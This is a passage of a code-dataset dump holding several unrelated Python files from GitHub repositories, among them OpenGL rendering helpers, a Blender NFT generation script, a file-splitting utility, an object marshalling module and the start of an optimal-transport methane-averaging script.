name in __SCHEDULER_ADAP_DICT__:\n            raise ValueError(\"Name %s already registered!\" % name)\n        if not issubclass(cls, BaseSchedulerAdapter):\n            raise ValueError(\n                \"Class %s is not a subclass of %s\"\n                % (cls, BaseSchedulerAdapter)\n            )\n        __SCHEDULER_ADAP_DICT__[name] = cls\n        return cls\n\n    return register_function_fn\n\n\nfor file in os.listdir(os.path.dirname(__file__)):\n    if file.endswith(\".py\") and not file.startswith(\"_\"):\n        module_name = file[: file.find(\".py\")]\n        module = importlib.import_module(\n            \"innofw.core.schedulers.\" + module_name\n        )\n\n\nclass Scheduler(nn.Module):\n    \"\"\"\n    Class provides same interface for different schedulers by utilizing adapters\n\n    Methods\n    -------\n    step()\n        updates a learning rate\n    \"\"\"\n\n    def __init__(self, scheduler, optimizer: Optimizer, *args, **kwargs):\n        super().__init__()\n        self.scheduler = get_sheduler_adapter(\n            scheduler, optimizer, *args, **kwargs\n        )\n\n    def step(self):\n        return self.scheduler.step()\n","repo_name":"InnopolisUni/innofw","sub_path":"innofw/core/schedulers/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2270,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"32336609742","text":"n = int(input())\r\ncnt = 0\r\nresult = []\r\nfor i in range(1, n):\r\n    arr = [n, n - i]\r\n\r\n    while 1:\r\n        if arr[-2] < arr[-1]:\r\n            break\r\n        else:\r\n            arr.append(arr[-2] - arr[-1])\r\n    if cnt < len(arr):\r\n        cnt = len(arr)\r\n        result = arr\r\nprint(cnt)\r\nprint(*result)\r\n\r\n","repo_name":"KHyeon9/Algorithm_Python","sub_path":"BOJ/Silver/2635.py","file_name":"2635.py","file_ext":"py","file_size_in_byte":309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34998698304","text":"#!/usr/bin/python3\nif __name__ == \"__main__\":\n    import sys\n    count = len(sys.argv)\n    args = sys.argv\n    sum = 0\n    if count == 1:\n        print(\"0\")\n    else:\n        for x in args[1:]:\n            x = int(x)\n            sum += x\n        print(sum)\n","repo_name":"mainanorbert/alx-higher_level_programming","sub_path":"0x02-python-import_modules/3-infinite_add.py","file_name":"3-infinite_add.py","file_ext":"py","file_size_in_byte":257,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12880665513","text":"from OpenGL.GL import *\nfrom OpenGL.GLU import *\nfrom OpenGL.GLUT import *\nimport numpy as np\nfrom config import config\nfrom transformasi import *\nfrom ctypes import *\n\ndef refresh2d():\n    glViewport(0, 0, config.width, config.height)\n    glMatrixMode(GL_PROJECTION)\n    glLoadIdentity()\n    glOrtho(config.curMinX, config.curMaxX,\n            config.curMinY, config.curMaxY, -10, 10)\n    glMatrixMode(GL_MODELVIEW)\n    gluLookAt(config.camX2D, config.camY2D, config.camZ2D, 0, 0, 0, 0, 1, 0)\n\n\ndef refresh3d():\n    glViewport(0, 0, config.width, config.height)\n    glMatrixMode(GL_PROJECTION)\n    glLoadIdentity()\n    glOrtho(config.curMinX, config.curMaxX,\n            config.curMinY, config.curMaxY, -100, 100)\n    glMatrixMode(GL_MODELVIEW)\n    gluLookAt(config.vecCam3D.item(0), config.vecCam3D.item(\n        1), config.vecCam3D.item(2), 0, 0, 0, 0, 1, 0)\n\n\ndef garis(startX, startY, startZ, finishX, finishY, finishZ):\n    glBegin(GL_LINES)\n    glVertex3f(startX, startY, startZ)\n    glVertex3f(finishX, finishY, finishZ)\n    glEnd()\n\n\ndef gambarSumbu(is3D):\n    if(is3D):\n        glLineWidth(4)\n        # Negative axes\n        glColor3f(1, 1, 1)\n        garis(config.curMinX, 0, 0, 0, 0, 0)\n        garis(0, config.curMinY, 0, 0, 0, 0)\n        garis(0, 0, config.curMinZ, 0, 0, 
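# negative Z axis: from (0, 0, curMinZ) back to the origin\n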
0)\n        # Positive axes\n        glColor3f(1, 0, 0)\n        garis(0, 0, 0, config.curMaxX, 0, 0)\n        glColor3f(0, 1, 0)\n        garis(0, 0, 0, 0, config.curMaxY, 0)\n        glColor3f(0, 0, 1)\n        garis(0, 0, 0, 0, 0, config.curMaxZ)\n        glLineWidth(1)\n    else:\n        glLineWidth(4)\n        glColor3f(1, 1, 1)\n        garis(config.curMinX, 0, 0, config.curMaxX, 0, 0)\n        garis(0, config.curMinY, 0, 0, config.curMaxY, 0)\n        glLineWidth(1)\n\n\ndef gambarGrid(is3D):\n    xy, xz, yz = config.xy, config.xz, config.yz\n    if(is3D):\n        dX = config.curMaxX-config.curMinX\n        dY = config.curMaxY-config.curMinY\n        dZ = config.curMaxZ-config.curMinZ\n        gridX, gridY, gridZ = np.ceil(dX/10), np.ceil(dY/10), np.ceil(dZ/10)\n\n        for i in range(6):\n            # XY\n            '''\n            glColor3f(xy[0],xy[1],xy[2])\n            garis(config.curMinX, i*gridY, 0, config.curMaxX, i*gridY, 0)\n            garis(config.curMinX, -i*gridY, 0, config.curMaxX, -i*gridY, 0)\n            '''\n\n            # XZ\n            glColor3f(xz[0], xz[1], xz[2])\n            garis(config.curMinX, 0, i*gridZ, config.curMaxX, 0, i*gridZ)\n            garis(config.curMinX, 0, -i*gridZ, config.curMaxX, 0, -i*gridZ)\n        for i in range(6):\n            # XY\n            '''\n            glColor3f(xy[0],xy[1],xy[2])\n            garis(i*gridX, config.curMinY, 0, i*gridX, config.curMaxY, 0)\n            garis(-i*gridX, config.curMinY, 0, -i*gridX, config.curMaxY, 0)\n            '''\n\n            # YZ\n            '''\n            glColor3f(yz[0],yz[1],yz[2])\n            garis(0, config.curMinY, i*gridZ, 0, config.curMaxY, i*gridZ)\n            garis(0, config.curMinY, -i*gridZ, 0, config.curMaxY, -i*gridZ)\n            '''\n        for i in range(6):\n            # XZ\n            glColor3f(xz[0], xz[1], xz[2])\n            garis(i*gridX, 0, config.curMinZ, i*gridX, 0, config.curMaxZ)\n            garis(-i*gridX, 0, config.curMinZ, -i*gridX, 0, config.curMaxZ)\n\n            # YZ\n            '''\n            glColor3f(yz[0],yz[1],yz[2])\n            garis(0, i*gridY, config.curMinZ, 0, i*gridY, config.curMaxZ)\n            garis(0, -i*gridY, config.curMinZ, 0, -i*gridY, config.curMaxZ)\n            '''\n    else:\n        glColor3f(xy[0], xy[1], xy[2])\n        dX = config.curMaxX-config.curMinX\n        dY = config.curMaxY-config.curMinY\n        gridX, gridY = np.ceil(dX/10), np.ceil(dY/10)\n        for i in range(10):\n            garis(config.curMinX, i*gridY, 0, config.curMaxX, i*gridY, 0)\n            garis(config.curMinX, -i*gridY, 0, config.curMaxX, -i*gridY, 0)\n        for i in range(10):\n            garis(i*gridX, config.curMinY, 0, i*gridX, config.curMaxY, 0)\n            garis(-i*gridX, config.curMinY, 0, -i*gridX, config.curMaxY, 0)\n    glColor3f(1, 1, 1)\n\ndef gambarText(x,y,teks,font=GLUT_BITMAP_HELVETICA_12):\n    # Text color\n    glColor3f(1,1,1)\n    # Print per char\n    glWindowPos2f(x,config.height-y-12)\n    for c in teks:\n        glutBitmapCharacter(font,c_int(ord(c)))\n\ndef bulat(x,presisi):\n    temp = 10**((presisi+1))\n    return int(x*temp)/temp\n\ndef draw():\n    glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)\n    glLoadIdentity()\n    if(config.is3D):\n        refresh3d()\n    else:\n        refresh2d()\n\n    config.objTest.gambar()\n    gambarGrid(config.is3D)\n    gambarSumbu(config.is3D)\n    # Draw the vector coordinates\n    gambarText(0,0,\"Vector coordinates:\")\n    y = 12\n    for i in config.objTest.listVertex:\n        teks = \"Coordinate \"+str(int(y/12))+\" : <\"+str(bulat(i.item(0),3))+\", \"+str(bulat(i.item(1),3))+\", \"+str(bulat(i.item(2),3))+\">\"\n        gambarText(0,y,teks)\n        y += 12\n    # Up to here\n    glutSwapBuffers()\n","repo_name":"AdityaPutraS/Tubes-Algeo-2","sub_path":"src/render.py","file_name":"render.py","file_ext":"py","file_size_in_byte":4961,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72707808168","text":"#!/usr/bin/python3\n\n# Fizzbuzz via if/elif/else\n\n# arg = int(input(\"Enter number: \"))\n\narg = 21\n\nfor i in range(1, arg + 1):\n    if i % 3 == 0 and i % 5 == 0:\n        
print(\"Fizzbuzz\")\n elif i % 3 == 0:\n print(\"Fizz\")\n elif i % 5 == 0:\n print(\"Buzz\")\n else:\n print(i)\n","repo_name":"bashM0nk3y/bin","sub_path":"python-test/fizzbuzz/fizzbuzz_if-else.py","file_name":"fizzbuzz_if-else.py","file_ext":"py","file_size_in_byte":298,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26904827135","text":"import bpy, hashlib, pprint\r\nimport cmath, json, time, numpy\r\nimport random as r\r\nimport numpy as np\r\nfrom math import sin, cos, sinh, cosh, pi\r\nfrom mathutils import Vector\r\n\r\n#BASE FUNCTIONS\r\ndef calcZ1(x, y, k, n):\r\n value = cmath.exp(1j*(2*cmath.pi*k/n)) * (cmath.cosh(x+y*1j))**(2/n)\r\n if ( abs(value.real) < 0.061171462611008 and abs(value.imag) < 0.061171462611008 ):\r\n value = 0 + 0j\r\n return value\r\n\r\ndef calcZ2(x, y, k, n):\r\n value = cmath.exp(1j*(2*cmath.pi*k/n)) * (1 / 1j) * (cmath.sinh(x+y*1j))**(2/n)\r\n if ( abs(value.real) < 0.061171462611008 and abs(value.imag) < 0.061171462611008 ):\r\n value = 0 + 0j\r\n return value\r\n\r\ndef calcZ1Real(x, y, k, n):\r\n return (calcZ1(x, y, k, n)).real\r\n\r\ndef calcZ2Real(x, y, k, n):\r\n return (calcZ2(x, y, k, n)).real\r\n\r\ndef calcZ(x, y, k1_, k2_, n1_, n2_, a_):\r\n scale_a = 1\r\n z1 = calcZ1(x, y, k1, n1_)\r\n z2 = calcZ2(x, y, k2, n2_)\r\n return z1.imag * cos(a_/scale_a) + z2.imag*sin(a_/scale_a)\r\n\r\n#METADATA STANDARD\r\nmetadata = {\r\n \"id\": 0,\r\n \"Name\": \"name\",\r\n \"DNA\": \"datahash\",\r\n \"n1\": 2,\r\n \"n2\": 2,\r\n \"Random angle\": 0,\r\n \"Random Texture\": 0,\r\n \"Random RGB\": 0,\r\n \"Random noise\": 0,\r\n \"Scarcity\": 0,\r\n \"dev\": {\r\n \"rend_mode\": \"Cycles 64 256 22\",\r\n \"res\": \"1920x1920\",\r\n \"dim\": 0\r\n }\r\n}\r\n\r\n#INITIAL TIME\r\nt0=time.time()\r\nseed=0000\r\n\r\n#QUALITY\r\ndim = 101\r\nvideo_mode = False\r\nmd_dev = metadata[\"dev\"]\r\nmd_dev[\"dim\"] = dim\r\n\r\n#PARAMS\r\nN_min = 3\r\nN_max = 16\r\nmat_max = 6\r\ncreated=(N_max-N_min)*(N_max-N_min)*mat_max\r\ncolor_index = 0\r\nindex_list = []\r\nmetadata_F_PATH = \"\"\r\nimages_F_PATH = \"\"\r\n\r\n\r\n#TEX SELECTION\r\ntmp_1 = 0\r\ntmp_2 = 0 \r\ntmp_3 = 0\r\ntmp_4 = 0 \r\ntmp_5 = 0\r\ngo = True\r\nprob=[]\r\nweigth = [1,1.5,2,2.5,3,3.5,4,4.5,5,5.5,6,6.5]\r\nrgb = [1,2,3,4,5,6]\r\nlen_wei = len(weigth)\r\ntot_wei = sum(weigth)\r\n\r\nfor i in range(0,len_wei):\r\n prob.append(weigth[i]/tot_wei)\r\n\r\nfor i in range(0,1014):\r\n index_list.append(i+1)\r\n \r\n\r\n#TEX SELECTION\r\ndef tex_selection():\r\n global weigth, len_wei, prob, go, tmp_1, tmp_2,tmp_3,tmp_4,tmp_5\r\n scar_rate = 0\r\n partial=0\r\n to_find=True\r\n rand = r.random() \r\n \r\n for i in range(0,len_wei):\r\n condition = tmp_1 != weigth[len_wei-1-i] and tmp_2 != weigth[len_wei-1-i] and tmp_3 != weigth[len_wei-1-i] and tmp_4 != weigth[len_wei-1-i] and tmp_5 != weigth[len_wei-1-i]\r\n if(rand < prob[i]+partial):\r\n if(to_find):\r\n if(condition):\r\n scar_rate = weigth[len_wei-1-i]\r\n to_find=False\r\n go = False\r\n if tmp_1==0:\r\n tmp_1=scar_rate\r\n else:\r\n if tmp_2==0:\r\n tmp_2=scar_rate\r\n else:\r\n if tmp_3==0:\r\n tmp_3=scar_rate\r\n else:\r\n if tmp_4==0:\r\n tmp_4=scar_rate\r\n else:\r\n tmp_5=scar_rate \r\n else:\r\n partial+=prob[i]\r\n \r\n return scar_rate\r\n\r\n#MATERIAL IMAGE\r\nmaterial_I = bpy.data.materials.new(name='material_I')\r\nmaterial_I.use_nodes = True\r\nmat_nodes_I = material_I.node_tree.nodes\r\nmat_links_I = material_I.node_tree.links\r\nprinc_BSDF_I = mat_nodes_I['Principled 
BSDF']\r\nprinc_BSDF_I.inputs[4].default_value = 0.5\r\nimage_tex = mat_nodes_I.new('ShaderNodeTexImage')\r\nimage_tex.projection ='FLAT'\r\nimage_tex.interpolation ='Smart'\r\nnoise_tex_I = mat_nodes_I.new('ShaderNodeTexNoise')\r\ncombine_tex_I = mat_nodes_I.new('ShaderNodeCombineRGB')\r\nseparate_tex_I = mat_nodes_I.new('ShaderNodeSeparateRGB')\r\nmat_links_I.new(noise_tex_I.outputs['Color'],image_tex.inputs['Vector'])\r\nmat_links_I.new(image_tex.outputs['Color'],separate_tex_I.inputs['Image'])\r\nmat_links_I.new(combine_tex_I.outputs['Image'],princ_BSDF_I.inputs['Base Color'])\r\ns_red = separate_tex_I.outputs[0]\r\ns_green = separate_tex_I.outputs[1]\r\ns_blue = separate_tex_I.outputs[2]\r\nc_red = combine_tex_I.inputs[0]\r\nc_green = combine_tex_I.inputs[1]\r\nc_blue = combine_tex_I.inputs[2]\r\n\r\n#RANGE\r\nx = np.linspace(0, pi/2, dim)\r\ny = np.linspace(-pi/2, pi/2, dim)\r\nx, y = np.meshgrid(x, y)\r\n\r\n#INIT RANDOM\r\nr.seed(a=seed)\r\n\r\nfor n1 in range(N_min,N_max):\r\n for n2 in range(N_min,N_max):\r\n tmp_1 = 0\r\n tmp_2 = 0 \r\n tmp_3 = 0\r\n tmp_4 = 0 \r\n tmp_5 = 0\r\n for mat in range(0,mat_max): \r\n tp0=time.time()\r\n color_index +=1\r\n \r\n ### RANDOM ### ANGLE SELECTION\r\n angle_r = ( (pi/8) + r.random()*(pi/4) ) % (pi/4)\r\n a_radian = angle_r\r\n\r\n################################# START #################################\r\n\r\n #INIT MESH DATA\r\n verts = [[]]\r\n edges = [[]]\r\n edge_set = []\r\n faces = [[]]\r\n face_set = []\r\n\r\n #BUILD\r\n for i in range(n1*n2):\r\n edge_set.append(set())\r\n face_set.append(set())\r\n\r\n count = 0\r\n for k1 in range(n1):\r\n for k2 in range(n2):\r\n # calc X, Y, Z values\r\n X = np.frompyfunc(calcZ1Real, 4, 1)(x, y, k1, n1).astype('float32')\r\n Y = np.frompyfunc(calcZ2Real, 4, 1)(x, y, k2, n2).astype('float32')\r\n Z = np.frompyfunc(calcZ, 7, 1)(x, y, k1, k2, n1, n2, a_radian).astype('float32')\r\n\r\n X_ = X.flatten()\r\n Y_ = Y.flatten()\r\n Z_ = Z.flatten()\r\n \r\n v = []\r\n for x1, y1, z1 in zip(X_, Y_, Z_):\r\n v.append(((float(x1), float(y1), float(z1))))\r\n verts[0].extend(v)\r\n \r\n for i in range(dim * dim):\r\n y_index = i / dim\r\n x_index = i % dim\r\n j = i + count * dim * dim\r\n if (y_index < dim - 1) and (x_index < dim - 1):\r\n edge_set[count].add(tuple(sorted([j, j+dim])))\r\n edge_set[count].add(tuple(sorted([j+dim, j+dim+1])))\r\n edge_set[count].add(tuple(sorted([j+dim+1, j+1])))\r\n edge_set[count].add(tuple(sorted([j+1, j])))\r\n face_set[count].add(tuple(([j, j+dim, j+dim+1, j+1])))\r\n \r\n count += 1\r\n\r\n for i in range(n1*n2):\r\n edges[0].extend(list(edge_set[i]))\r\n faces[0].extend(list(face_set[i]))\r\n \r\n################################# END #################################\r\n\r\n #MESH & SMOOTH\r\n mymesh = bpy.data.meshes.new(\"Fermat-Surface\")\r\n myobject = bpy.data.objects.new(\"Fermat-Surface\",mymesh)\r\n bpy.context.collection.objects.link(myobject)\r\n mymesh.from_pydata(verts[0],edges[0],faces[0])\r\n n_poly = len(myobject.data.polygons)\r\n for i in range(n_poly):\r\n myobject.data.polygons[i].use_smooth = True\r\n \r\n #DEL\r\n del(edge_set)\r\n del(face_set)\r\n del(verts)\r\n del(edges)\r\n del(faces)\r\n print(\"Memory cleaned\")\r\n\r\n #ROTATION\r\n frame_number = 0\r\n for i in range(0,360):\r\n angle = i*(2*pi/360)\r\n \r\n bpy.context.scene.frame_set(frame_number)\r\n myobject.rotation_euler[2] = angle\r\n myobject.keyframe_insert(data_path=\"rotation_euler\",index = -1)\r\n frame_number += 1\r\n \r\n ######################## MATERIAL 
######################## \r\n \r\n #TEX SELECTION\r\n go = True\r\n while(go):\r\n scar_rate = tex_selection()\r\n\r\n #SEPARATE AND COMBINE RGB\r\n rand = r.choice(rgb)\r\n if ( rand == 1 ):\r\n mat_links_I.new(s_red,c_red)\r\n mat_links_I.new(s_green,c_green)\r\n mat_links_I.new(s_blue,c_blue)\r\n\r\n if ( rand == 2 ):\r\n mat_links_I.new(s_red,c_green)\r\n mat_links_I.new(s_green,c_red)\r\n mat_links_I.new(s_blue,c_blue)\r\n\r\n if ( rand == 3 ):\r\n mat_links_I.new(s_red,c_blue)\r\n mat_links_I.new(s_green,c_green)\r\n mat_links_I.new(s_blue,c_red)\r\n\r\n if ( rand == 4 ):\r\n mat_links_I.new(s_red,c_red)\r\n mat_links_I.new(s_green,c_blue)\r\n mat_links_I.new(s_blue,c_green)\r\n \r\n if ( rand == 5 ):\r\n mat_links_I.new(s_red,c_blue)\r\n mat_links_I.new(s_green,c_red)\r\n mat_links_I.new(s_blue,c_green)\r\n \r\n if ( rand == 6 ):\r\n mat_links_I.new(s_red,c_green)\r\n mat_links_I.new(s_green,c_blue)\r\n mat_links_I.new(s_blue,c_red)\r\n \r\n\r\n #TEX CORR\r\n for i in range(0,len_wei):\r\n if scar_rate == weigth[i]:\r\n tex_name = i+1\r\n \r\n \r\n #APPLY TEXTURE & RANDOM NOISE\r\n myobject.data.materials.append(material_I)\r\n random_noise = 0.5 + 3.5*r.random()\r\n noise_tex_I.inputs[2].default_value = random_noise\r\n image_tex.image = bpy.data.images.load(\"...{}.jpg\".format(tex_name))\r\n\r\n \r\n #SCARCITY RATING\r\n scarcity = scar_rate + 1 \r\n if(n1==n2):\r\n scarcity+=12 \r\n\r\n #ID CHOICE\r\n id = r.choice(index_list)\r\n for i in range(0,len(index_list)):\r\n if (id == index_list[i]):\r\n to_del=i\r\n del index_list[to_del]\r\n\r\n #DNA\r\n string_name = str(id) + str(n1) + str(n2) + str(scar_rate) + str(rand) + \"secret key word\"\r\n data_hash = hashlib.sha256(string_name.encode('ascii')).hexdigest()\r\n \r\n #SAVE METADATA \r\n metadata[\"id\"] = id \r\n metadata[\"Name\"] = \"Fermat-Surface {}{}{}{}\".format(n1,n2,tex_name,rand)\r\n metadata[\"DNA\"] = str(data_hash)\r\n metadata[\"n1\"] = n1\r\n metadata[\"n2\"] = n2\r\n metadata[\"Random angle\"] = angle_r\r\n metadata[\"Random Texture\"] = tex_name\r\n metadata[\"Random RGB\"] = rand\r\n metadata[\"Random noise\"] = random_noise\r\n metadata[\"Scarcity\"] = scarcity\r\n file_name = str(n1) + str(n2) +str(tex_name) + str(rand)\r\n string = metadata_F_PATH + \"{}_{}_metadata.json\".format(id,file_name)\r\n f = open(string,'w')\r\n json.dump(metadata,f,indent=4)\r\n f.close()\r\n \r\n #CONSOLE LOG\r\n print(\"Number: {}/{}\".format(color_index,created))\r\n pprint.pprint(metadata)\r\n \r\n #RENDER\r\n scene = bpy.context.scene\r\n string = images_F_PATH + \"{}_{}_Fermat\".format(id,file_name)\r\n scene.render.filepath = string \r\n bpy.ops.render.render(animation=video_mode,write_still=True)\r\n\r\n #CONSOLE LOG\r\n print(\"Completed!\")\r\n tp1=time.time()\r\n dt=(tp1-tp0)/60\r\n print(\"Partial time: {}\".format(dt))\r\n \r\n #DEL RENDERED SPACE\r\n bpy.data.objects.remove(scene.objects['Fermat-Surface'],do_unlink=True)\r\n \r\n\r\n#CONSOLE LOG\r\nt1=time.time()\r\ndt=(t1-t0)/60\r\nprint(\"Created {} with dim {} in: {} min\".format(created,dim,dt))\r\n","repo_name":"Federico-Anastasi/NFTs","sub_path":"Fermat-Surfaces/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":11973,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74528049448","text":"import os\nimport shutil\nimport random\n\ndef copy_random_files(source_folder, destination_folder, percentage):\n # Get a list of all files in the source folder\n file_list = 
os.listdir(source_folder)\n \n # Calculate the number of files to move (the given fraction of the total files)\n num_files_to_copy = int(len(file_list) * percentage)\n\n #num_files_to_copy = 741\n\n print(f'num_files_to_MOVE={num_files_to_copy}')\n\n print(f'From {source_folder} to {destination_folder}')\n\n input(\"Press any key to continue...\")\n\n \n # Randomly select 'num_files_to_copy' files from the file list\n selected_files = random.sample(file_list, num_files_to_copy)\n \n # Move the selected files to the destination folder (shutil.move relocates them, it does not copy)\n for filename in selected_files:\n source_path = os.path.join(source_folder, filename)\n destination_path = os.path.join(destination_folder, filename)\n\n print(destination_path)\n shutil.move(source_path, destination_path)\n\n# Set the source and destination folder paths\nsource_folder_path = r'H:\My Drive\robocar\dataset\kitti\val\images'\ndestination_folder_path = r'H:\My Drive\robocar\dataset\kitti\test\images'\n\n\n# Specify the fraction of files to move (0.5 = 50%)\npercentage_to_copy = 0.5\n\n# Call the function to move a random subset of files\ncopy_random_files(source_folder_path, destination_folder_path, percentage_to_copy)\n","repo_name":"druv01/yolov8or5","sub_path":"utilities/train_validate_split.py","file_name":"train_validate_split.py","file_ext":"py","file_size_in_byte":1390,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"74423285287","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nfile: marshal.py\ndescription: Tools for marshalling objects / data around\nauthor: Luke de Oliveira (lukedeo@vaitech.io)\n\"\"\"\n\n\n\nfrom future import standard_library\n\nstandard_library.install_aliases()\n\nimport sys\n\nfrom builtins import bytes\nfrom builtins import str\nfrom builtins import object\n\nfrom pickle import (dumps as _dumps, loads as _obj_from_pkl_string,\n HIGHEST_PROTOCOL as _hp, PicklingError)\n\nfrom functools import partial\nimport gzip\nfrom json import dumps as _obj_to_json_string, loads as _obj_from_json_string\nimport io\n\nAVAILABLE_PROTOCOLS = ['auto', 'pickle', 'json', 'jsongz', 'bytes',\n 'bytesgz']\n\n\ndef _to_gzip(value):\n    out = io.BytesIO()\n    _ = gzip.GzipFile(fileobj=out, mode='wb').write(value)\n    return out.getvalue()\n\n\ndef _from_gzip(value):\n    return gzip.GzipFile(fileobj=io.BytesIO(value), mode='rb').read()\n\n\ndef _obj_to_pkl_string(o):\n    return _dumps(o, protocol=_hp)\n\n\nclass MarshalHandler(object):\n\n    PICKLE_IDENTIFIER = b'PKL||'\n    JSON_IDENTIFIER = b'JSN||'\n    JSONGZ_IDENTIFIER = b'JSNGZ||'\n    BYTES_IDENTIFIER = b'BYT||'\n    BYTESGZ_IDENTIFIER = b'BYTGZ||'\n\n    PROTOCOL_MAP = {\n        PICKLE_IDENTIFIER: 'pickle',\n        JSON_IDENTIFIER: 'json',\n        JSONGZ_IDENTIFIER: 'jsongz',\n        BYTES_IDENTIFIER: 'bytes',\n        BYTESGZ_IDENTIFIER: 'bytesgz'\n    }\n\n    def __init__(self):\n        self._protocol = 'auto'\n\n        self.FWD_PROJ_EXPR = {\n            'pickle': self._marshal_pickle,\n            'json': self._marshal_json,\n            'jsongz': partial(self._marshal_json, as_gzip=True),\n            'bytes': self._marshal_bytes,\n            'bytesgz': partial(self._marshal_bytes, as_gzip=True),\n        }\n\n        self.BWD_PROJ_EXPR = {\n            'pickle': self._unmarshal_pickle,\n            'json': self._unmarshal_json,\n            'jsongz': self._unmarshal_json,\n            'bytes': self._unmarshal_bytes,\n            'bytesgz': self._unmarshal_bytes\n        }\n\n    @staticmethod\n    def get_protocol(buf):\n        if buf.startswith(b'r'):\n            buf = buf[1:]\n        return MarshalHandler.PROTOCOL_MAP[buf.split(b'||')[0] + b'||']\n\n    @property\n    def protocol(self):\n        return self._protocol\n\n    
@protocol.setter\n def protocol(self, value):\n if value not in AVAILABLE_PROTOCOLS:\n raise ValueError('{} not a valid protocol'.format(value))\n self._protocol = value\n\n def _marshal_json(self, obj, as_gzip=False):\n try:\n buf = bytes(_obj_to_json_string(obj), 'utf-8')\n # buf = _obj_to_json_string(obj)\n except TypeError as e:\n raise TypeError('Object of class <{}> is not JSON '\n 'serializable'.format(type(obj)))\n if as_gzip:\n return self.JSONGZ_IDENTIFIER + _to_gzip(buf)\n return self.JSON_IDENTIFIER + buf\n\n def _marshal_bytes(self, obj, as_gzip=False):\n prepad = b''\n try:\n if isinstance(obj, bytes):\n buf = bytes(obj)\n prepad = b'r'\n elif isinstance(obj, str):\n buf = bytes(obj, 'utf-8')\n else:\n raise TypeError()\n except TypeError as e:\n raise TypeError('Object of class <{}> is not serializable by raw '\n 'bytes'.format(type(obj)))\n if as_gzip:\n return prepad + self.BYTESGZ_IDENTIFIER + _to_gzip(buf)\n return prepad + self.BYTES_IDENTIFIER + buf\n\n def _marshal_pickle(self, obj):\n try:\n buf = _obj_to_pkl_string(obj)\n except (TypeError, PicklingError, AttributeError):\n raise TypeError('Object of class {} is not '\n 'pickle-able'.format(type(obj)))\n return self.PICKLE_IDENTIFIER + buf\n\n def _unmarshal_json(self, buf):\n\n if buf.startswith(self.JSON_IDENTIFIER):\n return _obj_from_json_string(str(\n buf.replace(self.JSON_IDENTIFIER, b''), 'utf-8'\n ))\n\n if buf.startswith(self.JSONGZ_IDENTIFIER):\n return _obj_from_json_string(str(\n _from_gzip(buf.replace(self.JSONGZ_IDENTIFIER, b'')), 'utf-8'\n ))\n\n raise ValueError('Cannot unmarshal with JSON protocol when '\n 'identifier is of '\n 'type <{}>'.format(self.get_protocol(buf)))\n\n def _unmarshal_bytes(self, buf):\n prjexpr = lambda x: str(x, 'utf-8')\n if buf.startswith(b'r'):\n buf = buf[1:]\n prjexpr = lambda x: x\n if buf.startswith(self.BYTES_IDENTIFIER):\n return prjexpr(buf.replace(self.BYTES_IDENTIFIER, b''))\n if buf.startswith(self.BYTESGZ_IDENTIFIER):\n return prjexpr(_from_gzip(buf.replace(\n self.BYTESGZ_IDENTIFIER, b''\n )))\n\n raise ValueError('Cannot unmarshal with raw bytes protocol when '\n 'identifier is of '\n 'type <{}>'.format(self.get_protocol(buf)))\n\n def _unmarshal_pickle(self, buf):\n if buf.startswith(self.PICKLE_IDENTIFIER):\n return _obj_from_pkl_string(buf.replace(\n self.PICKLE_IDENTIFIER, b''\n ))\n\n raise ValueError('Cannot unmarshal with raw bytes protocol when '\n 'identifier is of '\n 'type <{}>'.format(self.get_protocol(buf)))\n\n def marshal(self, blob, override=None, ensure_immutable=False):\n if ensure_immutable:\n try:\n _ = hash(blob)\n except TypeError as e:\n raise TypeError(\n 'Unhashable type found: <{}>'.format(type(blob)))\n if override is not None:\n old_protocol = self._protocol\n self._protocol = override\n if self._protocol == 'auto':\n if override is not None:\n self._protocol = old_protocol\n if isinstance(blob, str) or isinstance(blob, bytes):\n return self._marshal_bytes(blob)\n try:\n return self._marshal_json(blob)\n except TypeError:\n return self._marshal_pickle(blob)\n retrieved = self.FWD_PROJ_EXPR[self._protocol](blob)\n if override is not None:\n self._protocol = old_protocol\n return retrieved\n\n def unmarshal(self, buf, **kwargs):\n if buf is None:\n return None\n return self.BWD_PROJ_EXPR[self.get_protocol(buf)](buf, 
**kwargs)\n","repo_name":"Python3pkg/Cupboard","sub_path":"cupboard/marshal.py","file_name":"marshal.py","file_ext":"py","file_size_in_byte":6573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1175308049","text":"from CH4Avg.utils.dev_unbalanced import (barycenter_unbalanced_sinkhorn2D,\n barycenter_unbalanced_sinkhorn2D_wind)\nfrom CH4Avg.utils.cost_matrices import CostMtx\nfrom CH4Avg.utils.preprocessing import load_data, preprocess\nimport ot\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport time\n\nbasepath = '../data/permian_wind_reprojected/'\n\n(A, dimx, dimy, wind, y_over_x_ratio) = load_data(\n basepath, quality_thr=1, iswind=(3, 4))\nA = preprocess(A[:, :], normalize=(lambda x: x/np.nanmean(x)))\nTot = preprocess(A, to_2D=(dimx, dimy))\n\n# M is of shape shape dimx / dimy ^ 4\nM = CostMtx(dimx, dimy, y_over_x_ratio=y_over_x_ratio)\n# Same as M above, but separable (hence much faster)\n# Cx of shape dimx ^ 2\n(Cx, Cy) = CostMtx(dimx, dimy, y_over_x_ratio=y_over_x_ratio, separable=True)\n\n# For 2D with wind\n(Cxs, Cys) = (np.zeros((Cx.shape[0], Cx.shape[0], Tot.shape[2])), np.zeros(\n (Cy.shape[0], Cy.shape[0], Tot.shape[2])))\n\n# negative because we want to \"reverse\" the effect of the wind\nwind_factor = 5\nfor i in range(Tot.shape[2]):\n (Cxs[:, :, i], Cys[:, :, i]) = CostMtx(\n dimx, dimy, y_over_x_ratio=y_over_x_ratio,\n separable=True, 